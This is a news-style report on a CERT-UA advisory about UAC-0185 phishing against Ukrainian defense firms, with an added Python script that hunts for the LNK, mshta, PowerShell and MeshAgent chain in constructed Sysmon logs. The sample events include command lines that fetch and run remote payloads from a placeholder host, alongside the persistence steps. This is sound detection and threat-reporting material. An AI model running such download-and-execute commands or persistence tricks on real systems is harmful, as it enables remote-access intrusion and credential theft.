CERT-UA, the Ukrainian government’s cybersecurity arm, issued a warning about a targeted phishing campaign, attributed to the group tracked as UAC-0185, aimed at Ukrainian defense organizations and enterprises of the defense-industrial complex (OPK).
The phishing emails impersonate the Ukrainian Union of Employers (UESP), relying on social engineering to make the lure credible.
These emails, disguised with the subject line “for your attention_changes_02-1-437 dated December 4, 2024,” entice recipients into attending a conference focused on aligning Ukrainian defense products with NATO technical standards.
The malicious payload sits behind a hyperlink labeled “Attachment contains important information for your participation” embedded in the email. Clicking the link downloads a Windows shortcut file named “letter_02-1-437.lnk” onto the victim’s machine.
Opening the LNK file launches the legitimate mshta.exe utility, which downloads and runs an HTML Application named “start.hta.” That file acts as the delivery stage: its embedded JavaScript launches two PowerShell commands.
Following the execution of the first command, a decoy file that has been crafted to look like a UESP letter is retrieved and opened, further obscuring the attacker’s intentions.
The second, more critical, command downloads a file named “Front.png.” Despite the image extension, this file is a ZIP archive containing three malicious components: “Main.bat,” “Registry.hta,” and “update.exe.”
The archive silently extracts its contents into a predetermined directory, “%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\” and subsequently executes the “Main.bat” batch script, which serves several purposes.
It copies “Registry.hta” into the user’s Startup folder so that it runs again after every reboot, deletes some of the downloaded files to reduce forensic artifacts, and then launches “Registry.hta.” “Registry.hta” in turn starts “update.exe,” which CERT-UA identified as MESHAGENT, the agent component of the open-source MeshCentral remote management tool, used here as a remote access trojan (RAT).
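The chain above (LNK → mshta.exe → remote HTA → PowerShell → staging directory → Startup-folder HTA → update.exe) leaves a distinctive trail in endpoint telemetry. The following is an added detection example, not CERT-UA code: it runs five hunt rules over Sysmon-style ProcessCreate (EventID 1) and FileCreate (EventID 11) records. The event records, the user name “victim” and the host “placeholder.invalid” are constructed for illustration and are not indicators from the advisory; the file names and the staging directory are the ones the advisory reports.

```python
"""Hunt for the UAC-0185 LNK -> mshta -> PowerShell -> MeshAgent chain
in Sysmon-style logs. Added example; the sample events are constructed."""
import re

# File names named in the advisory; used by the staging-directory rule.
STAGED_NAMES = {"front.png", "main.bat", "registry.hta", "update.exe"}

# Staging directory reported by CERT-UA (%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\).
STAGING_DIR_RE = re.compile(r"\\AppData\\Local\\Microsoft\\EdgeUpdate\\Update\\", re.I)
# Any .hta written into a per-user Startup folder.
STARTUP_HTA_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.hta$", re.I)
URL_RE = re.compile(r"https?://", re.I)

# Constructed sample telemetry (not real logs), in chronological order.
# The last record is benign noise: the real Edge updater under Program Files.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://placeholder.invalid/start.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -c iwr http://placeholder.invalid/Front.png"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Microsoft\EdgeUpdate\Update\Front.png"},
    {"EventID": 11, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows"
                       r"\Start Menu\Programs\Startup\Registry.hta"},
    {"EventID": 1, "Image": r"C:\Users\victim\AppData\Local\Microsoft\EdgeUpdate\Update\update.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "update.exe"},
    {"EventID": 1, "Image": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "MicrosoftEdgeUpdate.exe /svc"},
]


def _basename(path):
    """Lower-cased final path component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the list of (rule_id, description) pairs a single event triggers."""
    hits = []
    eid = ev.get("EventID")
    image = ev.get("Image", "")
    parent = ev.get("ParentImage", "")
    cmd = ev.get("CommandLine", "")
    target = ev.get("TargetFilename", "")
    if eid == 1:
        if _basename(image) == "mshta.exe" and URL_RE.search(cmd):
            hits.append(("R1", "mshta.exe executing a remote HTA"))
        if _basename(image) == "powershell.exe" and _basename(parent) == "mshta.exe":
            hits.append(("R2", "powershell.exe spawned by mshta.exe"))
        if STAGING_DIR_RE.search(image):
            hits.append(("R5", "process launched from the EdgeUpdate\\Update staging directory"))
    elif eid == 11:
        if STAGING_DIR_RE.search(target) and _basename(target) in STAGED_NAMES:
            hits.append(("R3", "advisory-named file written to the staging directory"))
        if STARTUP_HTA_RE.search(target):
            hits.append(("R4", ".hta dropped into a Startup folder (persistence)"))
    return hits


def scan(events):
    """Run every rule over every event; return findings with the event index."""
    findings = []
    for idx, ev in enumerate(events):
        for rule, desc in check_event(ev):
            findings.append({"index": idx, "rule": rule, "description": desc})
    return findings


def triggered_rules(events):
    """Sorted, de-duplicated rule ids that fired across the whole log."""
    return sorted({f["rule"] for f in scan(events)})


def is_chain(events, minimum=3):
    """Treat the host as compromised when several independent stages fire,
    so that one noisy rule (e.g. a lone mshta URL) does not page on its own."""
    return len(triggered_rules(events)) >= minimum


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f['index']}: {f['rule']} {f['description']}")
    print("chain detected:", is_chain(SAMPLE_EVENTS))
```

R1 alone is noisy in some environments, which is why `is_chain` requires several stages before escalating; R4 (an HTA in a Startup folder) and R5 (a binary executing out of a per-user EdgeUpdate\Update directory) are the strongest single signals, since the genuine Edge updater runs from Program Files.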
CERT-UA’s investigation uncovered additional files and infrastructure linked to cyberattacks stretching back to early 2023. The UAC-0185 group, also known by the alias UNC4221, has exhibited activity since at least 2022.
Their primary objective appears to be credential theft, specifically targeting credentials for popular messaging applications like Signal, Telegram, and WhatsApp.
They have also demonstrated the capability to conduct limited attacks aimed at establishing unauthorized remote access to compromised computer systems, potentially for further malicious activity.